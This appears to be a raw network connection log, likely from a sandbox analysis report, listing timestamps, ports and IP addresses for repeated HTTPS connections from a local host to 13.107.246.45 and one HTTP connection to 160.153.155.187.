Oct 31, 2024 19:20:16.859847069 CET	443	51327	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.859857082 CET	443	51327	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.863230944 CET	51333	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.863259077 CET	443	51333	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.863343000 CET	51333	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.863492012 CET	51333	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.863502026 CET	443	51333	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.884608030 CET	443	51329	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.884690046 CET	443	51329	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.884862900 CET	51329	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.884987116 CET	51329	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.885001898 CET	443	51329	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.885015011 CET	51329	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.885020971 CET	443	51329	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.887892962 CET	51334	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.887943029 CET	443	51334	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.888026953 CET	51334	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.888154030 CET	51334	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.888168097 CET	443	51334	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.937426090 CET	443	51330	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.937593937 CET	443	51330	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.937654972 CET	51330	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.937843084 CET	51330	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.937864065 CET	443	51330	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.937875986 CET	51330	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.937884092 CET	443	51330	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.941880941 CET	51335	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.941911936 CET	443	51335	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:16.941984892 CET	51335	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.942148924 CET	51335	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:16.942164898 CET	443	51335	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.422113895 CET	443	51331	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.431142092 CET	51331	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:17.431169033 CET	443	51331	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.434817076 CET	51331	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:17.434825897 CET	443	51331	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.557925940 CET	443	51331	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.557946920 CET	443	51331	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.557995081 CET	51331	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:17.558003902 CET	443	51331	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.558026075 CET	443	51331	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.558075905 CET	51331	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:17.558381081 CET	51331	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:17.558387041 CET	443	51331	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.558403015 CET	51331	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:17.558407068 CET	443	51331	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.559290886 CET	443	51332	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.559817076 CET	51332	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:17.559830904 CET	443	51332	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.560405016 CET	51332	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:17.560410976 CET	443	51332	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.561640978 CET	51337	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:17.561688900 CET	443	51337	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.561785936 CET	51337	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:17.561964989 CET	51337	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:17.561976910 CET	443	51337	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.626868010 CET	443	51334	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.628036022 CET	51334	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:17.628077030 CET	443	51334	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.628514051 CET	51334	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:17.628519058 CET	443	51334	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.632814884 CET	443	51333	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.633363962 CET	51333	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:17.633384943 CET	443	51333	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.633805990 CET	51333	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:17.633815050 CET	443	51333	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.684735060 CET	443	51335	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.685244083 CET	51335	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:17.685271978 CET	443	51335	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.685827017 CET	51335	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:17.685832977 CET	443	51335	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.689136982 CET	443	51332	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.689385891 CET	443	51332	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.689450026 CET	51332	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:17.689483881 CET	51332	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:17.689506054 CET	51332	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:17.689506054 CET	443	51332	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.689512014 CET	443	51332	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.692476034 CET	51338	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:17.692514896 CET	443	51338	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.692600012 CET	51338	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:17.692723036 CET	51338	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:17.692743063 CET	443	51338	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.761158943 CET	443	51334	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.761183977 CET	443	51334	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.761245966 CET	443	51334	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.761272907 CET	51334	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:17.761305094 CET	51334	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:17.761503935 CET	51334	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:17.761503935 CET	51334	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:17.761532068 CET	443	51334	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.761540890 CET	443	51334	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.764199018 CET	51339	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:17.764233112 CET	443	51339	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.764301062 CET	51339	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:17.764471054 CET	51339	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:17.764477015 CET	443	51339	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.768661022 CET	443	51333	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.769233942 CET	443	51333	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.769294977 CET	51333	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:17.769323111 CET	51333	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:17.769323111 CET	51333	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:17.769335032 CET	443	51333	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.769344091 CET	443	51333	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.771960974 CET	51340	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:17.772016048 CET	443	51340	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.772105932 CET	51340	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:17.772259951 CET	51340	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:17.772274971 CET	443	51340	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.816472054 CET	443	51335	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.816502094 CET	443	51335	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.816638947 CET	51335	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:17.816654921 CET	443	51335	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.816703081 CET	51335	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:17.816708088 CET	443	51335	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.816720009 CET	443	51335	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.816767931 CET	51335	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:17.817301989 CET	51335	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:17.817320108 CET	443	51335	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.817331076 CET	51335	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:17.817337036 CET	443	51335	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.821053028 CET	51341	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:17.821113110 CET	443	51341	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:17.821221113 CET	51341	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:17.821389914 CET	51341	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:17.821403027 CET	443	51341	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.300432920 CET	443	51337	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.301198959 CET	51337	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:18.301218033 CET	443	51337	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.301799059 CET	51337	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:18.301804066 CET	443	51337	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.425905943 CET	443	51338	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.426564932 CET	51338	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:18.426590919 CET	443	51338	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.426970005 CET	51338	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:18.426976919 CET	443	51338	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.431632042 CET	443	51337	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.431664944 CET	443	51337	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.431723118 CET	443	51337	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.431746960 CET	51337	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:18.431787014 CET	51337	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:18.432054996 CET	51337	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:18.432068110 CET	443	51337	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.432080030 CET	51337	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:18.432085037 CET	443	51337	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.435587883 CET	51342	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:18.435604095 CET	443	51342	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.435707092 CET	51342	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:18.435885906 CET	51342	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:18.435895920 CET	443	51342	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.487160921 CET	443	51340	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.487951040 CET	51340	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:18.487976074 CET	443	51340	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.488378048 CET	51340	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:18.488383055 CET	443	51340	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.506443977 CET	443	51339	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.506911993 CET	51339	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:18.506922007 CET	443	51339	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.507302999 CET	51339	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:18.507307053 CET	443	51339	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.554171085 CET	443	51338	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.554342031 CET	443	51338	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.554512024 CET	51338	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:18.554649115 CET	51338	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:18.554649115 CET	51338	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:18.554672956 CET	443	51338	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.554682970 CET	443	51338	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.557056904 CET	443	51341	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.557487965 CET	51341	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:18.557507992 CET	443	51341	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.557935953 CET	51341	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:18.557940960 CET	443	51341	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.558224916 CET	51343	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:18.558260918 CET	443	51343	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.558330059 CET	51343	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:18.558476925 CET	51343	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:18.558487892 CET	443	51343	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.614697933 CET	443	51340	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.614772081 CET	443	51340	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.614914894 CET	51340	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:18.615101099 CET	51340	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:18.615123034 CET	443	51340	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.615134001 CET	51340	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:18.615139961 CET	443	51340	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.618215084 CET	51344	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:18.618256092 CET	443	51344	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.618386030 CET	51344	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:18.618513107 CET	51344	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:18.618526936 CET	443	51344	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.637778997 CET	443	51339	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.637955904 CET	443	51339	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.638025999 CET	51339	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:18.642625093 CET	51339	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:18.642656088 CET	443	51339	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.642683983 CET	51339	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:18.642689943 CET	443	51339	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.646475077 CET	51345	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:18.646511078 CET	443	51345	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.646584034 CET	51345	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:18.646737099 CET	51345	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:18.646752119 CET	443	51345	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.686187029 CET	443	51341	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.686408043 CET	443	51341	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.686602116 CET	51341	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:18.686716080 CET	51341	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:18.686716080 CET	51341	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:18.686736107 CET	443	51341	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.686745882 CET	443	51341	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.690102100 CET	51346	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:18.690140009 CET	443	51346	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:18.690233946 CET	51346	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:18.690465927 CET	51346	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:18.690479994 CET	443	51346	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.199014902 CET	443	51342	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.203607082 CET	51342	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:19.203624964 CET	443	51342	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.204375029 CET	51342	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:19.204381943 CET	443	51342	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.292793989 CET	443	51343	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.293431044 CET	51343	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:19.293457031 CET	443	51343	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.293970108 CET	51343	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:19.293976068 CET	443	51343	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.329768896 CET	443	51342	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.329839945 CET	443	51342	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.329895973 CET	51342	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:19.330214977 CET	51342	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:19.330230951 CET	443	51342	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.330240011 CET	51342	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:19.330245972 CET	443	51342	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.343327045 CET	51347	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:19.343368053 CET	443	51347	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.343466043 CET	443	51344	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.343489885 CET	51347	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:19.343857050 CET	51347	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:19.343869925 CET	443	51347	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.344033957 CET	51344	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:19.344049931 CET	443	51344	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.344738007 CET	51344	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:19.344743967 CET	443	51344	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.378590107 CET	443	51345	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.379307032 CET	51345	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:19.379327059 CET	443	51345	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.380211115 CET	51345	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:19.380217075 CET	443	51345	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.421782017 CET	443	51346	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.422027111 CET	443	51343	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.422118902 CET	443	51343	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.422167063 CET	51343	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:19.422395945 CET	51346	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:19.422409058 CET	443	51346	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.422465086 CET	51343	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:19.422465086 CET	51343	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:19.422480106 CET	443	51343	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.422492027 CET	443	51343	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.422801971 CET	51346	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:19.422811031 CET	443	51346	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.425693035 CET	51348	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:19.425719023 CET	443	51348	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.426040888 CET	51348	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:19.426100016 CET	51348	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:19.426112890 CET	443	51348	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.472287893 CET	443	51344	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.472352028 CET	443	51344	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.472408056 CET	51344	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:19.472645044 CET	51344	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:19.472668886 CET	443	51344	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.472681046 CET	51344	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:19.472687960 CET	443	51344	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.475781918 CET	51349	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:19.475825071 CET	443	51349	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.475886106 CET	51349	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:19.476041079 CET	51349	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:19.476056099 CET	443	51349	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.511687040 CET	443	51345	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.511754990 CET	443	51345	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.511810064 CET	51345	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:19.512077093 CET	51345	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:19.512077093 CET	51345	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:19.512094021 CET	443	51345	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.512104988 CET	443	51345	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.515058994 CET	51350	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:19.515094042 CET	443	51350	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.515187979 CET	51350	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:19.515333891 CET	51350	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:19.515347004 CET	443	51350	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.577649117 CET	443	51346	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.578763008 CET	443	51346	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.578882933 CET	51346	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:19.578975916 CET	51346	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:19.578975916 CET	51346	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:19.578994036 CET	443	51346	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.579005003 CET	443	51346	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.582505941 CET	51351	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:19.582549095 CET	443	51351	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.582602024 CET	51351	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:19.582900047 CET	51351	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:19.582911015 CET	443	51351	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:19.600204945 CET	49737	80	192.168.2.4	160.153.155.187
Oct 31, 2024 19:20:19.605407953 CET	80	49737	160.153.155.187	192.168.2.4
Oct 31, 2024 19:20:19.605465889 CET	49737	80	192.168.2.4	160.153.155.187
Oct 31, 2024 19:20:20.070585012 CET	443	51347	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:20.071559906 CET	51347	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:20.071573973 CET	443	51347	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:20.072050095 CET	51347	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:20.072057009 CET	443	51347	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:20.156198978 CET	443	51348	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:20.160630941 CET	51348	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:20.160651922 CET	443	51348	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:20.161351919 CET	51348	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:20.161358118 CET	443	51348	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:20.196160078 CET	443	51349	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:20.200054884 CET	443	51347	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:20.200130939 CET	443	51347	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:20.200198889 CET	51347	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:20.200355053 CET	51349	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:20.200387001 CET	443	51349	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:20.200483084 CET	51347	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:20.200483084 CET	51347	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:20.200498104 CET	443	51347	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:20.200510025 CET	443	51347	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:20.200889111 CET	51349	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:20.200896025 CET	443	51349	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:20.203964949 CET	51352	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:20.203980923 CET	443	51352	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:20.204102993 CET	51352	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:20.204262972 CET	51352	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:20.204284906 CET	443	51352	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:21.284194946 CET	443	51348	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:21.284225941 CET	443	51348	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:21.284287930 CET	51348	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:21.284296036 CET	443	51348	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:21.284303904 CET	443	51349	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:21.284372091 CET	51348	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:21.284451962 CET	443	51349	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:21.284538031 CET	51349	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:21.284640074 CET	51348	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:21.284655094 CET	443	51348	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:21.284668922 CET	51348	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:21.284673929 CET	443	51348	13.107.246.45	192.168.2.4
